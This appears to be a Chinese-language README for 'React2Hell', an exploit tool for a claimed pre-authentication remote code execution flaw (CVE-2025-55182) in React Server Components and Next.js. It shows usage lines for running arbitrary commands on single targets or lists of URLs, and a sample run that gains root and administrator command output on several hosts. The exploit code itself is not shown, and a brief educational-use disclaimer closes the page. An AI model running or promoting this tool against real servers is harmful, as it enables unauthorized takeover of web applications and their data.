🔥 Next.js / React 服务器远程代码执行 (RCE) 漏洞利用工具
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
Next.js/React 服务器 RCE 漏洞利用工具 — CVE-2025-55182
作者: Chetanya Sharma (AggressiveUser)
════════════════════════════════════════════════════════════════════════
用法: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]
React2Hell 是一款强大的漏洞利用工具,用于测试和利用 CVE-2025-55182,这是一个影响 Next.js 和 React Server Actions 的严重远程代码执行漏洞。
在 React Server Components 版本 19.0.0、19.1.0、19.1.1 和 19.2.0 中存在一个预认证远程代码执行漏洞,受影响包包括:react-server-dom-parcel、react-server-dom-turbopack 和 react-server-dom-webpack。脆弱代码会不安全地从 HTTP 请求中对发送到服务器函数端点的载荷进行反序列化。
python exploit.py -u https://target.com -c "whoami"
python exploit.py -l urls.txt -c "whoami"
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
http://site1.com
https://site2.com
http://192.168.1.10:3000
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
Next.js/React 服务器 RCE 漏洞利用工具 — CVE-2025-55182
作者: Chetanya Sharma (AggressiveUser)
════════════════════════════════════════════════════════════════════════
[+] 已加载 3 个目标
════════════════════════════════════════════════════════════════════════
[→] 目标: http://meow.host:3113/
[→] 执行: whoami
[✓] 存在漏洞 — RCE 成功!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[→] 目标: http://evil.lab:2000/
[→] 执行: whoami
[✗] 未发现漏洞 — 状态码: 200
────────────────────────────────────────────────────────────────────────
[→] 目标: https://vul.lab:3000/
[→] 执行: whoami
[✓] 存在漏洞 — RCE 成功!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] 扫描完成 — 存在漏洞: 2
PS D:\AggressiveUser_PVT\React2Hell>
此工具仅用于教育及安全研究目的。 未经明确授权,请勿将其用于任何系统。 您需对自己的行为负责。
如果此漏洞利用工具对您有帮助,不妨在 GitHub 上留个 ⭐ ❤️
Chetanya Sharma (AggressiveUser)
由热爱破坏与修复的人 🔥 制作